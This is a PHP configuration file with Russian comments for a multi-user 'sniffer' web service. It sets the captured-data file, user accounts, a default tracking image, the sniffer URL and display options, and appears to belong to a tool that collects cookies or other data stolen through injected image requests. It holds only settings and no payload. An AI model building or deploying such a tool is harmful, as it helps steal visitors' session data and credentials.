<?
if (!defined("FILE")) die("Ошибка доступа.");

$data_filename = "data.txt";       // имя файла с данными сниффера
$users_filename = "users.txt";     // имя файла с данными о пользователях
$image_filename = "i.gif";         // имя файла с изображением по умолчанию
$style_filename = "simple.css";    // имя файла со стилем по умолчанию

$sniffer_path = "http://sniffer_path/";
                            // полный путь к снифферу. на конце должен быть слэш
$admin = "admin";           // логин администратора, разрешающий доступ к admin.php
                            // (должен быть зарегистрирован обычным способом)
$retrieve_enabled = true;   // сервис восстановления пароля
$from_email = "";           // e-mail отправителя при отправке письма с забытым паролем
                            // (также используется на странице FAQ как администраторский)

$max_entries = 0;           // лимит записей (для всех пользователей). впишите 0 для снятия лимита
$entries_on_page = 0;       // кол-во записей на одной странице (для всех пользователей)
                            // впишите 0, чтобы отключить постраничный вывод
$pages_pos = "updown";      // где располагать список страниц (при включенной пред. опции)
                            // возможные значения: "up" - вверху, "down" - внизу, "updown" - вверху и внизу
$menu_pos = "down";         // где располагать меню: в правом верхнем углу или внизу под записями
                            // возможные значения: "corner" - в углу, "down" - внизу
$styles_enabled = true;     // пользователь может сам выбирать стиль
$allow_changeimg = true;    // пользователь может прописать путь к своему изображению
                            // вместо установленного в $image_filename
$info_line = true;          // показывать полосу информации в верху страницы (время, IP, ссылка "Обновить")

$i_max_entries[""] = 0;        // индивидуальная настройка лимита записей и их кол-ва на одной странице
$i_entries_on_page[""] = 0;    // вы можете задать любую цифру для любого конкретного пользователя,
                               // если он существует, прописав ["юзернейм"] как ключ массива
?>